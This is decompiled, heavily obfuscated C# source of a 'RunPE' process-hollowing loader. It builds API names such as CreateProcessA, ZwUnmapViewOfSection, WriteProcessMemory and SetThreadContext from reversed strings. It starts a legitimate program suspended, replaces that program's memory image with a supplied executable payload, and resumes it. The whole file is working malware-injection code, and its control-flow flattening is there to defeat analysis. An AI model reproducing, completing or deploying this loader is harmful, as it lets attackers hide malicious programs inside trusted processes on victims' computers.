// Warning: Some assembly references could not be resolved automatically. This might lead to incorrect decompilation of some parts, // for ex. property getter/setter access. To get optimal decompilation results, please manually add the missing references to the list of loaded assemblies. // runpe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // order.yes using System; using System.Diagnostics; using System.Runtime.InteropServices; using order; public static class yes { private delegate int Delegate0(IntPtr handle); private delegate bool Delegate1(IntPtr thread, int[] context); private delegate bool Delegate2(IntPtr thread, int[] context); private delegate bool Delegate3(IntPtr thread, int[] context); private delegate bool Delegate4(IntPtr thread, int[] context); private delegate int Delegate5(IntPtr handle, int address, int length, int type, int protect); private delegate bool Delegate6(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); private delegate bool Delegate7(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); private delegate int Delegate8(IntPtr process, int baseAddress); private delegate bool Delegate9(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Struct1 startupInfo, ref Struct0 processInformation); [StructLayout(LayoutKind.Sequential, Pack = 1)] private struct Struct0 { public readonly IntPtr intptr_0; public readonly IntPtr intptr_1; public readonly uint uint_0; private readonly uint uint_1; } [StructLayout(LayoutKind.Sequential, Pack = 1)] private struct Struct1 { public uint uint_0; private readonly string string_0; private readonly string string_1; private readonly string string_2; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] private readonly byte[] byte_0; private readonly IntPtr intptr_0; private readonly IntPtr intptr_1; private readonly IntPtr intptr_2; private readonly IntPtr intptr_3; } private static string[] string_0 = Convert.ToString("23lenrek|lldtn|daerhTemuseR|txetnoCdaerhTteS46woW|txetnoCdaerhTteS|txetnoCdaerhTteG46woW|txetnoCdaerhTteG|xEcollAlautriV|yromeMssecorPetirW|yromeMssecorPdaeR|noitceSfOweiVpamnUwZ|AssecorPetaerC|").Split(new string[1] { "|" }, StringSplitOptions.None); private static string string_1; private static string string_2; private static string string_3; private static string string_4; private static string string_5; private static string string_6; private static string FmffedpoU; private static string string_7; private static string string_8; private static string string_9; private static string string_10; private static string string_11; private static readonly Delegate0 delegate0_0; private static readonly Delegate1 delegate1_0; private static readonly Delegate2 delegate2_0; private static readonly Delegate3 delegate3_0; private static readonly Delegate4 delegate4_0; private static readonly Delegate5 delegate5_0; private static readonly Delegate6 delegate6_0; private static readonly Delegate7 delegate7_0; private static readonly Delegate8 delegate8_0; private static readonly Delegate9 delegate9_0; private static string smethod_0(string string_12) { string result = default(string); string text = default(string); bool flag = default(bool); int num3 = default(int); while (true) { int num = -182621391; while (true) { uint num2; switch ((num2 = (uint)num ^ 0xAA142A05u) % 10u) { case 9u: result = text; num = (int)((num2 * 1468303116) ^ 0x49C44C8); continue; case 8u: num = (int)(num2 * 1126234823) ^ -1975236799; continue; case 7u: { int num4; int num5; if (flag) { num4 = 2092358217; num5 = 2092358217; } else { num4 = 1378074789; num5 = 1378074789; } num = num4 ^ (int)(num2 * 1000400265); continue; } case 6u: text = ""; num3 = string_12.Length - 1; num = (int)((num2 * 1805398699) ^ 0x1597BD27); continue; case 5u: num = ((int)num2 * -1054755974) ^ 0x6F009764; continue; case 4u: text += string_12[num3]; num3--; num = ((int)num2 * -956446027) ^ -1540841963; continue; case 3u: num = -2134886613; continue; case 2u: flag = num3 >= 0; num = -1560971266; continue; case 0u: break; default: return result; } break; } } } [DllImport("kernel32", SetLastError = true)] private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string string_12); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern IntPtr GetProcAddress(IntPtr intptr_0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string string_12); private unsafe static T smethod_1(object object_0, object object_1) { T result = (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&object_0)), ref *(string*)(&object_1)), typeof(T)); while (true) { int num = -1141402450; while (true) { uint num2; switch ((num2 = (uint)num ^ 0xDEAB2CFFu) % 3u) { case 2u: goto IL_0025; case 0u: break; default: return result; } break; IL_0025: num = (int)(num2 * 1189493330) ^ -684938926; } } } public static void Execute(string path, byte[] payload) { uint num = 420596485u; int num2 = 0; bool flag4 = default(bool); int num7 = default(int); int bufferSize = default(int); bool flag17 = default(bool); int[] array = default(int[]); bool flag3 = default(bool); bool flag15 = default(bool); bool flag11 = default(bool); bool flag16 = default(bool); int num40 = default(int); int num33 = default(int); int srcOffset = default(int); int num19 = default(int); int num15 = default(int); int length = default(int); int num9 = default(int); int buffer = default(int); int num16 = default(int); byte[] array2 = default(byte[]); bool flag12 = default(bool); bool flag6 = default(bool); int num14 = default(int); bool flag7 = default(bool); bool flag9 = default(bool); short num26 = default(short); int num25 = default(int); bool flag8 = default(bool); bool flag10 = default(bool); bool flag13 = default(bool); bool flag14 = default(bool); bool flag5 = default(bool); while (true) { bool flag = num2 < 5; int num3 = 9848796; while (true) { switch ((num = (uint)num3 ^ 0x3E0691EFu) % 5u) { case 3u: num2++; num3 = 170510366; continue; case 2u: num3 = 171826151; continue; case 1u: { if (!flag) { num3 = ((int)num * -800578150) ^ 0x5CACF755; continue; } int bytesWritten = 0; Struct1 startupInfo = default(Struct1); Struct0 processInformation = default(Struct0); startupInfo.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(Struct1))); try { bool flag2 = !delegate9_0(path, string.Empty, IntPtr.Zero, IntPtr.Zero, inheritHandles: false, 134217732u, IntPtr.Zero, null, ref startupInfo, ref processInformation); while (true) { int num4 = 2138586973; while (true) { switch ((num = (uint)num4 ^ 0x3E0691EFu) % 76u) { case 75u: { int num10; int num11; if (flag4) { num10 = -555776695; num11 = -555776695; } else { num10 = -758921288; num11 = -758921288; } num4 = num10 ^ ((int)num * -1091942078); continue; } case 74u: { int num29; int num30; if (!flag2) { num29 = -310899580; num30 = -310899580; } else { num29 = -1941287759; num30 = -1941287759; } num4 = num29 ^ (int)(num * 1344981982); continue; } case 73u: { int num8; if (delegate6_0(processInformation.intptr_0, num7, payload, bufferSize, ref bytesWritten)) { num4 = 546117217; num8 = 546117217; } else { num4 = 1277841475; num8 = 1277841475; } continue; } case 72u: flag17 = !delegate3_0(processInformation.intptr_1, array); num4 = (int)((num * 1366839287) ^ 0x10ABCC1E); continue; case 71u: num4 = (int)(num * 1924060960) ^ -955226800; continue; case 70u: flag3 = delegate2_0(processInformation.intptr_1, array); num4 = (int)((num * 1286461066) ^ 0x29C2C38A); continue; case 69u: { int num38; int num39; if (flag15) { num38 = -1726399991; num39 = -1726399991; } else { num38 = -160229496; num39 = -160229496; } num4 = num38 ^ (int)(num * 534159826); continue; } case 67u: { int num23; int num24; if (flag11) { num23 = 1929860551; num24 = 1929860551; } else { num23 = 935202474; num24 = 935202474; } num4 = num23 ^ (int)(num * 1052223104); continue; } case 66u: { int num45; int num46; if (flag16) { num45 = 2053309107; num46 = 2053309107; } else { num45 = 1075251106; num46 = 1075251106; } num4 = num45 ^ (int)(num * 522527451); continue; } case 65u: num4 = (int)((num * 2082113967) ^ 0x41D05A3A); continue; case 63u: { num40 = BitConverter.ToInt32(payload, num33 + 16); srcOffset = BitConverter.ToInt32(payload, num33 + 20); int num41; int num42; if (num40 == 0) { num41 = -2044314112; num42 = -2044314112; } else { num41 = -1744183728; num42 = -1744183728; } num4 = num41 ^ (int)(num * 2111148972); continue; } case 62u: num19 = BitConverter.ToInt32(payload, num33 + 12); num4 = 1948841968; continue; case 61u: num7 = delegate5_0(processInformation.intptr_0, num15, length, 12288, 64); flag15 = num7 == 0; num4 = ((int)num * -2142491794) ^ -1012446892; continue; case 60u: num9 = array[41]; buffer = 0; num4 = 1169712234; continue; case 59u: num16 = BitConverter.ToInt32(payload, 60); num15 = BitConverter.ToInt32(payload, num16 + 52); num4 = 1755343267; continue; case 58u: num33 = num16 + 248; num4 = 207587741; continue; case 56u: num4 = (int)((num * 343819984) ^ 0x37232ED2); continue; case 55u: Buffer.BlockCopy(payload, srcOffset, array2, 0, array2.Length); num4 = ((int)num * -258135312) ^ -1194031149; continue; case 54u: { int num21; int num22; if (flag12) { num21 = -254206099; num22 = -254206099; } else { num21 = -1950557060; num22 = -1950557060; } num4 = num21 ^ (int)(num * 310431002); continue; } case 53u: flag12 = num15 == buffer; num4 = 2059910541; continue; case 52u: flag11 = !delegate6_0(processInformation.intptr_0, num7 + num19, array2, array2.Length, ref bytesWritten); num4 = ((int)num * -1995308707) ^ 0x33BF0E60; continue; case 51u: num4 = ((int)num * -1209566208) ^ 0x671ABF78; continue; case 49u: { byte[] bytes = BitConverter.GetBytes(num7); flag6 = !delegate6_0(processInformation.intptr_0, num9 + 8, bytes, 4, ref bytesWritten); num4 = (int)(num * 1085410340) ^ -1431397662; continue; } case 48u: num4 = (int)(num * 319170225) ^ -500106916; continue; case 46u: array[44] = num7 + num14; flag7 = IntPtr.Size == 4; num4 = 495542227; continue; case 45u: flag4 = !delegate7_0(processInformation.intptr_0, num9 + 8, ref buffer, 4, ref bytesWritten); num4 = (int)(num * 246766094) ^ -111200186; continue; case 44u: { num14 = (int)Type.GetType(smethod_0("retrevnoCtiB.metsyS")).GetMethod(smethod_0("23tnIoT")).Invoke(0, new object[2] { payload, num16 + 40 }); int num47; if (!flag9) { num4 = 148363145; num47 = 148363145; } else { num4 = 1765105466; num47 = 1765105466; } continue; } case 43u: num4 = (int)(num * 75498693) ^ -1196846372; continue; case 42u: num26 = BitConverter.ToInt16(payload, num16 + 6); num25 = 0; num4 = ((int)num * -470712019) ^ -1118933175; continue; case 41u: num4 = 280844244; continue; case 40u: array2 = new byte[num40]; num4 = ((int)num * -1781729487) ^ 0x17C93618; continue; case 39u: num33 += 40; num4 = 2044529839; continue; case 38u: num4 = 255491121; continue; case 37u: { int num43; int num44; if (!flag17) { num43 = 1427440187; num44 = 1427440187; } else { num43 = 1746870546; num44 = 1746870546; } num4 = num43 ^ ((int)num * -1658400894); continue; } case 35u: num25++; num4 = ((int)num * -654607310) ^ -32765852; continue; case 34u: num4 = ((int)num * -2075671707) ^ 0x30DA7DA1; continue; case 33u: flag16 = !flag8; num4 = ((int)num * -1347058607) ^ 0x31A97F34; continue; case 32u: { int num36; int num37; if (!flag10) { num36 = 1309453283; num37 = 1309453283; } else { num36 = 661070712; num37 = 661070712; } num4 = num36 ^ (int)(num * 972096574); continue; } case 31u: num4 = 1745416750; continue; case 30u: bufferSize = BitConverter.ToInt32(payload, num16 + 84); num4 = (int)((num * 2042500000) ^ 0x3AB3205B); continue; case 29u: num4 = 2091610909; continue; case 27u: { int num34; int num35; if (flag13) { num34 = -679438544; num35 = -679438544; } else { num34 = -1354518949; num35 = -1354518949; } num4 = num34 ^ (int)(num * 400178471); continue; } case 26u: num4 = (int)(num * 822239013) ^ -1542997511; continue; case 25u: { int num31; int num32; if (flag14) { num31 = 1726945517; num32 = 1726945517; } else { num31 = 1527467099; num32 = 1527467099; } num4 = num31 ^ (int)(num * 1166423359); continue; } case 24u: { int num27; int num28; if (flag7) { num27 = -897120649; num28 = -897120649; } else { num27 = -810575483; num28 = -810575483; } num4 = num27 ^ ((int)num * -276469320); continue; } case 22u: flag14 = delegate8_0(processInformation.intptr_0, buffer) != 0; num4 = ((int)num * -1988474565) ^ 0x14D169B0; continue; case 21u: flag13 = num25 < num26; num4 = 1032740728; continue; case 19u: num4 = 1694639061; continue; case 18u: { int num20; if (delegate0_0(processInformation.intptr_1) != -1) { num4 = 1839625070; num20 = 1839625070; } else { num4 = 1478473225; num20 = 1478473225; } continue; } case 17u: { int num17; int num18; if (flag6) { num17 = 393459233; num18 = 393459233; } else { num17 = 1533830560; num18 = 1533830560; } num4 = num17 ^ ((int)num * -1664300021); continue; } case 16u: array = new int[179]; array[0] = 65538; flag10 = IntPtr.Size == 4; num4 = (int)((num * 383371919) ^ 0x6B40FF87); continue; case 15u: length = BitConverter.ToInt32(payload, num16 + 80); num4 = 14376677; continue; case 12u: flag9 = false; num4 = (int)((num * 1709570113) ^ 0x50807786); continue; case 9u: flag8 = delegate1_0(processInformation.intptr_1, array); num4 = (int)(num * 765118100) ^ -541404538; continue; case 8u: num4 = ((int)num * -406620368) ^ 0x79C93759; continue; case 6u: num4 = 1980862263; continue; case 5u: num7 = num15; num4 = ((int)num * -609978053) ^ 0x45F08F9E; continue; case 4u: { int num12; int num13; if (flag5) { num12 = 57826020; num13 = 57826020; } else { num12 = 1342290965; num13 = 1342290965; } num4 = num12 ^ ((int)num * -177645226); continue; } case 3u: flag5 = !delegate4_0(processInformation.intptr_1, array); num4 = ((int)num * -965880726) ^ -1403610731; continue; case 2u: num4 = 261389518; continue; case 1u: { int num5; int num6; if (flag3) { num5 = 613694821; num6 = 613694821; } else { num5 = 1134960697; num6 = 1134960697; } num4 = num5 ^ ((int)num * -367296803); continue; } case 0u: num4 = 1284003431; continue; default: return; case 7u: break; case 10u: throw new Exception(); case 11u: throw new Exception(); case 13u: throw new Exception(); case 14u: throw new Exception(); case 20u: throw new Exception(); case 23u: throw new Exception(); case 28u: throw new Exception(); case 36u: throw new Exception(); case 47u: throw new Exception(); case 57u: throw new Exception(); case 64u: throw new Exception(); case 68u: throw new Exception(); case 50u: return; } break; } } } catch { while (true) { IL_0a60: int num48 = 557689566; while (true) { switch ((num = (uint)num48 ^ 0x3E0691EFu) % 4u) { case 2u: Process.GetProcessById(Convert.ToInt32(processInformation.uint_0)).Kill(); num48 = ((int)num * -1614415938) ^ -1758910881; continue; case 1u: num48 = (int)((num * 2024828304) ^ 0x7BE8D8C9); continue; default: goto end_IL_0a3e; case 3u: break; case 0u: goto end_IL_0a3e; } goto IL_0a60; continue; end_IL_0a3e: break; } break; } } goto case 3u; } default: return; case 4u: break; case 0u: return; } break; } } } static yes() { while (true) { int num = -669095907; while (true) { uint num2; switch ((num2 = (uint)num ^ 0xA2DFA7B0u) % 12u) { case 11u: delegate0_0 = smethod_1(smethod_0(string_1), smethod_0(string_3)); num = (int)((num2 * 92770233) ^ 0x10161F50); continue; case 9u: delegate6_0 = smethod_1(smethod_0(string_1), smethod_0(string_8)); num = ((int)num2 * -1825288037) ^ 0xB827F41; continue; case 8u: delegate3_0 = smethod_1(smethod_0(string_1), smethod_0(string_6)); delegate4_0 = smethod_1(smethod_0(string_1), smethod_0(FmffedpoU)); delegate5_0 = smethod_1(smethod_0(string_1), smethod_0(string_7)); num = (int)(num2 * 202899740) ^ -1512637915; continue; case 7u: delegate1_0 = smethod_1(smethod_0(string_1), smethod_0(string_4)); delegate2_0 = smethod_1(smethod_0(string_1), smethod_0(string_5)); num = ((int)num2 * -482628099) ^ -1070131217; continue; case 6u: string_6 = string_0[5]; FmffedpoU = string_0[6]; string_7 = string_0[7]; num = ((int)num2 * -1292594128) ^ 0x5E51E282; continue; case 5u: string_1 = string_0[0]; num = (int)(num2 * 34292714) ^ -2084840839; continue; case 3u: string_2 = string_0[1]; num = ((int)num2 * -837643027) ^ 0x15FA1A32; continue; case 2u: string_8 = string_0[8]; string_9 = string_0[9]; string_10 = string_0[10]; string_11 = string_0[11]; num = (int)((num2 * 1110115946) ^ 0xDD8DE5B); continue; case 1u: string_3 = string_0[2]; string_4 = string_0[3]; num = (int)((num2 * 749911345) ^ 0x131CE6FD); continue; case 0u: string_5 = string_0[4]; num = (int)((num2 * 1201080651) ^ 0x982FFC2); continue; case 4u: break; default: delegate7_0 = smethod_1(smethod_0(string_1), smethod_0(string_9)); delegate8_0 = smethod_1(smethod_0(string_2), smethod_0(string_10)); delegate9_0 = smethod_1(smethod_0(string_1), smethod_0(string_11)); return; } break; } } } }